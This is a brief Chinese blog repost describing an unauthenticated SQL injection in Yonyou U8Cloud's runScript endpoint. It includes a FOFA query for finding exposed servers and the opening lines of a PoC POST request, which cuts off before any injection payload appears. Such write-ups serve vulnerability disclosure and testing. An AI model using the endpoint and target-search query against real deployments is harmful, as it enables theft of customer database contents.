本文主要是介绍用友U8Cloud runScript SQL注入漏洞复现(含nuclei-poc),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
一、产品介绍
用友U8Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
二、漏洞描述
用友U8Cloud runScript 路由 存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
三、漏洞危害
未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
四、漏洞复现
fofa:app="用友-NC-Cloud"
POC:
POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHT
这篇关于用友U8Cloud runScript SQL注入漏洞复现(含nuclei-poc)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!